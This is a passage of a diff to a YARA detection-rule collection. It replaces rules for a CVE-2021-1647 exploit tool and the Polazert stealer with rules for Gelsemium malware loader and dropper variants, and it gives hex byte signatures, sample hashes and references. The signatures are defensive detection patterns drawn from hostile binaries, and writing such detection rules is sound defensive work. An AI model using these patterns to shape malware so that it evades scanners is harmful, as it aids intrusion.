c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 98 04 00 00 e8 d7 ac 00 00 90 48 83 7d 50 08 72 0a 48 8b 4d 38 ff 15 fd 2f 06 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 4c 89 a5 b8 04 00 00 4c 89 a5 c0 04 00 00 4c 89 a5 c8 04 00 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 41 b8 01 00 00 00 48 8d 15 0d e3 08 00 48 8d 4d e8 e8 b8 ad 00 00 90 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 41 b8 0d 00 00 00 48 8d 15 e9 e2 08 00 48 8d 4d a8 e8 90 ad 00 00 90 e8 ea 2b ff ff 48 8d 48 30 48 8d 55 a8 e8 cd 74 00 00 48 8b d0 4c 8d 45 e8 48 8d 8d b8 04 00 00 e8 1a 55 01 00 90 48 83 7d c0 08 72 0a 48 8b 4d a8 ff 15 50 2f 06 00 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 48 83 7d 00 08 72 0a 48 8b 4d e8 ff 15 2e 2f 06 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 48 8d 85 98 04 00 00 48 89 85 c0 00 00 00 48 8d 85 88 04 00 00 48 89 85 c8 00 00 00 48 8b 9d b8 04 00 00 48 8b bd c0 04 00 00 48 3b df 0f 84 8b 02 00 00 66 90 4c 89 a5 48 05 00 00 4c 89 a5 50 05 00 00 48 c7 45 30 07 00 00 00 4c 89 65 28 66 44 89 65 18 4c 8d 85 50 04 00 00 48 83 bd 68 04 00 00 08 4c 0f 43 85 50 04 00 00 48 8d 95 50 04 00 00 48 0f 43 95 50 04 00 00 48 8b 85 60 04 00 00 4d 8d 04 40 48 8d 4d 18 e8 37 b4 01 00 90 48 8d 55 18 48 8d 8d 48 05 00 00 e8 36 9a 00 00 90 48 83 7d 30 }
+		$s2 = { 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4c 8b 85 88 04 00 00 4d 8b c8 4d 8b 00 48 8d 95 28 02 00 00 48 8d 8d 88 04 00 00 e8 d1 fe 00 00 48 8b 8d 88 04 00 00 ff 15 5c 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 41 b8 0e 00 00 00 48 8d 15 b7 db 08 00 48 8d 4d c8 e8 ee d0 00 00 90 48 8d 4d c8 e8 54 8c 01 00 48 8b d8 48 83 7d e0 10 72 0a 48 8b 4d c8 ff 15 18 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 48 }
+		$s3 = { 48 8d 8d a8 02 00 00 e8 88 64 01 00 90 48 8b 08 48 89 4c 24 38 48 8b 48 08 48 89 4c 24 40 4c 89 20 4c 89 60 08 48 8d 54 24 38 48 8d 4c 24 48 e8 a0 8e 01 00 90 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 41 b8 0b 00 00 00 48 8d 15 d9 d3 08 00 48 8d 4d 88 e8 a8 a5 00 00 90 48 8d 54 24 48 48 8d 4d 88 e8 d9 60 00 00 90 48 83 7d a0 08 72 0a 48 8b 4d 88 ff 15 7f 27 06 00 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 48 8b 4c 24 48 48 85 c9 74 0b 48 8b 01 ba 01 00 00 00 ff 10 90 48 8b 4c 24 40 }
+		$s4 = { 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 85 df 06 00 49 8b ce e8 05 dd ff ff e8 e0 db ff ff 48 8d 78 30 e8 27 fc ff ff 33 f6 84 c0 0f 85 ae 01 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 44 8d 46 07 48 8d 15 cf 84 09 00 48 8d 4c 24 20 e8 45 5d 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 44 8d 46 07 48 8d 15 a6 84 09 00 48 8d 4c 24 40 e8 1c 5d 01 00 90 48 8d 54 24 20 48 8b cf e8 5e 24 01 00 48 8b d8 48 8d 54 24 40 48 8d 4d 18 e8 4d 24 01 00 48 8b c8 48 8b d3 e8 72 c1 ff ff 85 c0 0f 9e c3 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 d2 de 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 ac de 06 00 84 db 0f 84 ed 00 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 20 00 00 00 48 8d 15 ec 84 09 00 48 8d 4c 24 20 e8 82 5c 01 00 90 48 8d 05 3a aa 09 00 48 89 44 24 40 48 c7 44 24 60 07 00 00 00 48 89 74 24 58 66 89 74 24 48 49 83 c9 ff 45 33 c0 48 8d 54 24 20 48 8d 4c 24 48 e8 0c 5b 01 00 90 48 8d 05 e4 a8 09 00 48 89 45 80 48 8d 4d 88 ff 15 76 de 06 00 48 8d 05 ff e7 06 00 48 89 45 a0 48 89 75 a8 48 89 75 b0 48 89 75 b8 c7 45 c0 ff ff ff ff 48 8b 45 80 48 63 48 04 48 8d 05 71 9a 09 00 48 89 44 0d 80 48 8b 45 80 48 63 48 08 48 8d 05 bd ac 09 00 48 89 44 0d 80 48 8d 54 24 40 48 8d 4d 80 e8 a2 e0 02 00 48 8b d0 41 b8 01 00 00 00 48 8d 4d d0 e8 e0 05 00 00 48 8d 15 81 f8 0b 00 48 8d 4d d0 e8 a2 46 06 00 90 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 0b 00 00 00 48 8d 15 67 83 09 00 48 8d 4c 24 20 e8 95 5b 01 00 90 48 8d 54 24 20 49 8b cd e8 d7 22 01 00 49 3b c4 74 13 49 83 c9 ff 45 33 c0 49 8b d4 48 8b c8 e8 30 5a 01 00 90 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 54 dd 06 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 07 00 00 00 48 8d 15 bc 82 09 00 48 8d 4c 24 20 e8 32 5b 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 41 b8 07 00 00 00 48 8d 15 91 82 09 00 48 8d 4c 24 40 e8 07 5b 01 00 90 48 8d 54 24 20 48 8d 4d 18 e8 48 22 01 00 48 8b d8 48 8d 54 24 40 48 8b cf e8 38 22 01 00 48 3b c3 74 13 49 83 c9 ff 45 33 c0 48 8b d3 48 8b c8 e8 91 59 01 00 90 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 b5 dc 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_EXP_CVE_2021_1647_Apr_2021_1 : CVE_2021_1647 FILE
+rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_1 : FILE
 {
 	meta:
-		description = "Detect CVE-2021-1647 tool "
+		description = "Detect Gelsenicine malware (Loader - Variant 1)"
 		author = "Arkbird_SOLG"
-		id = "c4c14d22-adf8-51b1-b898-7e253447824f"
-		date = "2021-05-04"
-		modified = "2021-05-05"
-		reference = "-"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-04/CVE-2021-1647/EXP_CVE_2021_1647_Apr_2021_1.yara#L1-L18"
+		id = "36276150-a5dd-5385-9e50-958a6fa54de5"
+		date = "2021-06-12"
+		modified = "2021-06-14"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "58f16973f68b1b792f6f1575b6a3f386493d033767ee97e48a33044e3ddc3426"
+		logic_hash = "66d9fad7105b46a55db11c5224b1a395793f2dee89f779d59c80b2f7cda5a115"
 		score = 75
 		quality = 75
-		tags = "CVE-2021-1647, FILE"
-		hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788"
-		hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b"
-		hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7"
-		hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a"
-		tlp = "Green"
-		adversary = "-"
+		tags = "FILE"
+		hash1 = "97982e098a4538d05e78c172c9bbc5b412754df86dc73e760004f0038ec928fb"
+		hash2 = "46338cae732ee1664aac77d9dce57c4ff8666460c1a51bee49cae44c86e42df9"
+		hash3 = "f0d23aa026ae6ba96051401dc2b390ba5c968d55c2a4b31a36e45fb67dfc2e3c"
+		tlp = "white"
+		adversary = "Gelsemium"
 
 	strings:
-		$seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 }
-		$seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc }
+		$s1 = { b8 [3] 74 e8 [2] 00 00 81 ec bc 03 00 00 53 56 57 be [3] 74 8d bd 38 fc ff ff 6a 1b a5 a5 a5 a5 66 a5 59 33 c0 8d bd 4a fc ff ff be [3] 74 f3 ab 66 ab 8d bd b8 fc ff ff 6a 1c a5 a5 a5 a5 59 33 c0 8d bd c8 fc ff ff 6a 07 f3 ab 59 be [3] 74 8d bd 38 fd ff ff 6a 18 f3 a5 66 a5 8b 5d 0c 59 8d bd 56 fd ff ff 83 65 cc 00 f3 ab 66 ab 8a 03 6a 00 8d 4d e0 c7 45 c0 24 00 00 00 c7 45 c4 25 00 00 00 c7 45 c8 23 00 00 00 88 45 e0 ff 15 [3] 74 a1 [3] 74 8d 4d e0 ff 30 6a 00 53 ff 15 [3] 74 8a 45 0f 6a 00 8d 4d d0 c7 45 fc 01 00 00 00 88 45 d0 ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8d 4d d0 ff 15 [3] 74 8b 55 d4 8b 0d [3] 74 85 d2 c6 45 fc 02 75 02 8b d1 8b 43 04 85 c0 75 02 8b c1 ff 75 d8 52 50 ff 15 [3] 74 83 c4 0c 85 c0 0f 85 d9 00 00 00 8d 85 b8 fd ff ff 50 68 04 01 00 00 ff 15 [3] 74 8d 85 b8 fd ff ff 50 ff d6 85 c0 59 0f 84 b5 00 00 00 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 2f 59 74 56 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 5c 59 74 41 8d 4d e0 ff 15 [3] 74 8b 7d e4 8b 5d d8 8d 4d e0 ff 15 [3] 74 8b 45 e4 89 45 f0 8d 85 b8 fd ff ff 50 ff d6 59 8d 84 45 b8 fd ff ff 50 8d 85 b8 fd ff ff 50 8d 44 5f fe 50 ff }
+		$s2 = { ff 75 0c 89 45 f0 ff d6 50 ff 75 0c ff 75 f0 ff 15 [3] 74 83 c4 10 85 c0 }
+		$s3 = "pluginkey" fullword wide
+		$s4 = { 55 8b ec 51 33 c0 56 f6 05 [3] 74 01 89 45 fc 0f 85 c6 00 00 00 8a 4d 0b 80 0d [3] 74 01 53 bb [3] 74 57 88 0d [3] 74 50 8b cb ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 68 [2] e2 74 e8 [2] 00 00 59 5f 33 c0 5b 8b 75 08 8a 4d 0b 68 [3] 74 68 [3] 74 88 0e 50 8b ce 89 46 04 89 46 08 89 46 0c e8 [2] 00 00 8b c6 5e }
 
 	condition:
-		filesize > 10KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize > 15KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Polazert_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Gelsemium_Gelsemine_June_2021_1 : FILE
 {
 	meta:
-		description = "Detect Polazert stealer"
+		description = "Detect Gelsemine malware (Dropper - Variant 1)"
 		author = "Arkbird_SOLG"
-		id = "c7766749-558f-50b8-9054-01f5c4e1238b"
-		date = "2021-04-11"
-		modified = "2021-04-11"
-		reference = "https://bazaar.abuse.ch/browse/tag/Polazert/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-11/Polazert/MAL_Polazert_Apr_2021_1.yar#L1-L21"
+		id = "cfe932fd-ff50-5e54-824c-e11afe8e8575"
+		date = "2021-06-12"
+		modified = "2021-06-14"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsemine_June_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "29cefeb3816435e70c706ac78395738f075f6c9f81d63e7295b0d8a6f370b51d"
+		logic_hash = "2b5031412de163ad92dfe00c7da331eb36c4ce7b590df48dfa84df0104e93b15"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		hash1 = "00b701e3ef29912c1fcd8c2154c4ae372cfe542cfa54ffcce9fb449883097cec"
+		hash2 = "109d4b8878b8c8f3b7015f6b3ae573a6799296becce0f32ca3bd216bee0ab473"
+		hash3 = "fe71b66d65d5ff9d03a47197c99081d9ec8d5f6e95143bdc33f5ea2ac0ae5762"
+		hash3 = "29e78ca3cb49dd2985a29e74cafb1a0a15515670da0f4881f6095fb2926bfefd"
+		tlp = "white"
+		adversary = "Gelsemium"
 
 	strings:
-		$seq1 = { 73 ?? 00 00 0a 13 ?? 11 ?? 72 [2] 00 70 6f ?? 00 00 0a 00 11 ?? 72 [2] 00 70 11 ?? 72 [2] 00 70 28 ?? 00 00 0a 6f ?? 00 00 0a 00 11 ?? 17 6f ?? 00 00 0a 00 11 ?? 28 ?? 00 00 0a 26 }
-		$seq2 = { 1b 8d 0e 00 00 01 13 ?? 11 ?? 16 72 a1 03 00 70 a2 11 ?? 17 08 a2 11 ?? 18 72 53 03 00 70 a2 11 ?? 19 11 ?? a2 11 ?? 1a 72 e7 03 00 70 a2 11 ?? 28 47 00 00 0a 13 0a }
-		$seq3 = { 02 73 ?? 00 00 0a 28 ?? 00 00 0a 74 2a 00 00 01 [2-4] 72 65 01 00 70 6f ?? 00 00 0a 00 [1-2] 72 65 01 00 70 6f ?? 00 00 0a 00 [1-2] 72 87 01 00 70 6f ?? 00 00 0a 00 03 [1-2] 73 ?? 00 00 0a 13 }
-		$seq4 = { 1f 0f 8d ?? 00 00 01 13 ?? 11 ?? 16 72 ?? ?? 00 70 a2 11 ?? 17 [1-2] a2 11 ?? 18 72 [2] 00 70 a2 11 ?? 19 28 ?? 00 00 06 a2 11 ?? 1a 72 ?? ?? 00 70 a2 11 ?? 1b 28 ?? 00 00 06 a2 11 ?? 1c 72 ?? ?? 00 70 a2 11 ?? 1d 28 ?? 00 00 06 2d 07 72 ?? ?? 00 70 2b 05 72 ?? ?? 00 70 a2 11 ?? 1e 72 ?? ?? 00 70 a2 11 ?? 1f 09 28 ?? 00 00 06 2d 07 72 ?? ?? 00 70 2b 05 72 ?? ?? 00 70 a2 11 ?? 1f 0a 72 [2] 00 70 a2 11 ?? 1f 0b [1-2] 7b 01 00 00 04 a2 11 ?? 1f 0c 72 [2] 00 70 a2 11 ?? 1f 0d 28 ?? 00 00 06 a2 11 ?? 1f 0e 72 [2] 00 70 a2 11 ?? 28 ?? 00 00 0a 13 }
-		$seq5 = { 1f ?? 8d ?? 00 00 01 13 ?? 11 ?? 16 72 91 01 00 70 a2 11 ?? 17 1a 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 68 9d 11 ?? 17 1f 77 9d 11 ?? 18 1f 69 9d 11 ?? 19 1f 64 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 18 72 b7 01 00 70 a2 11 ?? 19 ?? [0-1] a2 11 ?? 1a 72 bf 01 00 70 a2 11 ?? 1b 28 ?? 00 00 06 a2 11 ?? 1c 72 db 01 00 70 a2 11 ?? 1d 28 ?? 00 00 06 a2 11 ?? 1e 72 f7 01 00 70 a2 11 ?? 1f 09 28 ?? 00 00 06 2d 07 72 0d 02 00 70 2b 05 72 15 02 00 70 a2 11 ?? 1f 0a 72 1d 02 00 70 a2 11 ?? 1f 0b 28 ?? 00 00 06 2d 07 72 37 02 00 70 2b 05 72 41 02 00 70 a2 11 ?? 1f 0c 72 4d 02 00 70 a2 11 ?? 1f 0d ?? 7b ?? 00 00 04 a2 11 ?? 1f 0e 72 69 02 00 70 a2 11 ?? 1f 0f 1f 09 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 6f 9d 11 ?? 18 1f 72 9d 11 ?? 19 1f 6b 9d 11 ?? 1a 1f 67 9d 11 ?? 1b 1f 72 9d 11 ?? 1c 1f 6f 9d 11 ?? 1d 1f 75 9d 11 ?? 1e 1f 70 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 1f 10 72 b7 01 00 70 a2 11 ?? 1f 11 28 ?? 00 00 06 a2 11 ?? 1f 12 72 71 02 00 70 a2 11 ?? 1f 13 1f 14 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 69 9d 11 ?? 18 1f 6e 9d 11 ?? 19 1f 33 9d 11 ?? 1a 1f 32 9d 11 ?? 1b 1f 5f 9d 11 ?? 1c 1f 63 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 70 9d 11 ?? 1f 0a 1f 75 9d 11 ?? 1f 0b 1f 74 9d 11 ?? 1f 0c 1f 65 9d 11 ?? 1f 0d 1f 72 9d 11 ?? 1f 0e 1f 73 9d 11 ?? 1f 0f 1f 79 9d 11 ?? 1f 10 1f 73 9d 11 ?? 1f 11 1f 74 9d 11 ?? 1f 12 1f 65 9d 11 ?? 1f 13 1f 6d 9d 11 ?? 28 ?? 00 00 06 1c 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 64 9d 11 ?? 17 1f 6f 9d 11 ?? 18 1f 6d 9d 11 ?? 19 1f 61 9d 11 ?? 1a 1f 69 9d 11 ?? 1b 1f 6e 9d 11 ?? 28 ?? 00 00 06 28 ?? 00 00 06 a2 11 ?? 1f 14 72 69 02 00 70 a2 11 ?? 1f 15 19 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 64 9d 11 ?? 17 1f 6e 9d 11 ?? 18 1f 73 9d 11 ?? 28 ?? 00 00 06 a2 11 ?? 1f 16 72 79 02 00 70 a2 11 ?? 1f 17 1f 14 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 77 9d 11 ?? 17 1f 69 9d 11 ?? 18 1f 6e 9d 11 ?? 19 1f 33 9d 11 ?? 1a 1f 32 9d 11 ?? 1b 1f 5f 9d 11 ?? 1c 1f 63 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 70 9d 11 ?? 1f 0a 1f 75 9d 11 ?? 1f 0b 1f 74 9d 11 ?? 1f 0c 1f 65 9d 11 ?? 1f 0d 1f 72 9d 11 ?? 1f 0e 1f 73 9d 11 ?? 1f 0f 1f 79 9d 11 ?? 1f 10 1f 73 9d 11 ?? 1f 11 1f 74 9d 11 ?? 1f 12 1f 65 9d 11 ?? 1f 13 1f 6d 9d 11 ?? 28 ?? 00 00 06 1f 0c 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 70 9d 11 ?? 17 1f 61 9d 11 ?? 18 1f 72 9d 11 ?? 19 1f 74 9d 11 ?? 1a 1f 6f 9d 11 ?? 1b 1f 66 9d 11 ?? 1c 1f 64 9d 11 ?? 1d 1f 6f 9d 11 ?? 1e 1f 6d 9d 11 ?? 1f 09 1f 61 9d 11 ?? 1f 0a 1f 69 9d 11 ?? 1f 0b 1f 6e 9d 11 ?? 28 ?? 00 00 06 28 ?? 00 00 06 6f ?? 00 00 0a 72 7f 02 00 70 28 ?? 00 00 0a 2d 07 72 8b 02 00 70 2b 05 72 8f 02 00 70 a2 11 ?? 1f 18 }
-		$seq6 = { 13 30 02 00 2d 00 00 00 ?? 00 00 11 00 72 ?? ?? 00 70 28 ?? 00 00 0a 28 ?? 00 00 0a 73 ?? 00 00 0a 0a 06 72 ?? ?? 00 70 6f ?? 00 00 0a 0b 07 6f ?? 00 00 0a }
-		$seq7 = { 8d ?? 00 00 01 13 ?? 11 ?? 16 72 [2] 00 70 a2 11 ?? 17 [1-2] a2 11 ?? 18 72 [2] 00 70 a2 11 ?? 19 [2] a2 11 ?? 1a 72 [2] 00 70 a2 11 }
-		$seq8 = { 12 ?? 28 ?? 00 00 06 0f 00 28 ?? 00 00 06 d0 ?? 00 00 1b 28 ?? 00 00 0a 28 ?? 00 00 0a a5 ?? 00 00 1b [1-2] 2b 00 [1-2] 2a }
-		$seq9 = { 1f 10 8d ?? 00 00 01 13 ?? 11 ?? 16 1f 47 9d 11 ?? 17 1f 65 9d 11 ?? 18 1f 74 9d 11 ?? 19 1f 54 9d 11 ?? 1a 1f 68 9d 11 ?? 1b 1f 72 9d 11 ?? 1c 1f 65 9d 11 ?? 1d 1f 61 9d 11 ?? 1e 1f 64 9d 11 ?? 1f 09 1f 43 9d 11 ?? 1f 0a 1f 6f 9d 11 ?? 1f 0b 1f 6e 9d 11 ?? 1f 0c 1f 74 9d 11 ?? 1f 0d 1f 65 9d 11 ?? 1f 0e 1f 78 9d 11 ?? 1f 0f 1f 74 9d 11 ?? 28 97 00 00 06 28 09 00 00 2b 13 }
+		$s1 = { 8b 44 24 04 83 ec 40 85 c0 53 55 56 57 0f 84 ec 15 00 00 8b 58 1c 85 db 0f 84 e1 15 00 00 8b 48 0c 85 c9 0f 84 d6 15 00 00 83 38 00 75 0b 8b 48 04 85 c9 0f 85 c6 15 00 00 83 3b 0b 75 06 c7 03 0c 00 00 00 8b 48 0c 8b 30 8b 78 04 8b 53 38 8b 6b 3c 89 4c 24 28 8b 48 10 8b 03 83 f8 1e 89 4c 24 20 89 74 24 14 89 7c 24 18 89 54 24 10 89 7c 24 38 89 4c 24 2c c7 44 24 34 00 00 00 }
+		$s2 = { 33 c0 33 d2 8a 06 8a 56 01 03 c8 33 c0 8a 46 02 03 f9 03 ca 33 d2 8a 56 03 03 f9 03 c8 33 c0 8a 46 04 03 f9 03 ca 33 d2 8a 56 05 03 f9 03 c8 33 c0 8a 46 06 03 f9 03 ca 33 d2 8a 56 07 03 f9 03 c8 33 c0 8a 46 08 03 f9 03 ca 33 d2 8a 56 09 03 f9 03 c8 33 c0 8a 46 0a 03 f9 03 ca 33 d2 8a 56 0b 03 f9 03 c8 33 c0 8a 46 0c 03 f9 03 ca 33 d2 8a 56 0d 03 f9 03 c8 33 c0 8a 46 0e 03 f9 03 ca 33 d2 8a 56 0f 03 f9 03 c8 83 c6 10 03 f9 03 ca 03 f9 4d 0f 85 67 ff ff ff 8b c1 33 d2 b9 f1 ff 00 00 f7 f1 8b c7 bf f1 ff 00 00 8b ca 33 d2 f7 f7 ff 4c 24 18 8b fa 0f 85 38 ff ff ff 85 db 0f 84 da 00 00 00 83 fb 10 0f 82 a1 00 00 00 8b eb c1 ed 04 33 d2 33 c0 8a 16 8a 46 01 03 ca 33 d2 8a 56 02 03 f9 03 c8 33 c0 8a 46 03 03 f9 03 ca 33 d2 8a 56 04 03 f9 03 c8 33 c0 8a 46 05 03 f9 03 ca 33 d2 8a 56 06 03 f9 03 c8 33 c0 8a 46 07 03 f9 03 ca 33 d2 8a 56 08 03 f9 03 c8 33 c0 8a 46 09 03 f9 03 ca 33 d2 8a 56 0a 03 f9 03 c8 33 c0 8a 46 0b 03 f9 03 ca 33 d2 8a 56 0c 03 f9 03 c8 33 c0 8a 46 0d 03 f9 03 ca 33 d2 8a 56 0e 03 f9 03 c8 33 c0 8a 46 0f 03 f9 03 ca 83 eb 10 03 f9 03 c8 03 f9 83 c6 10 }
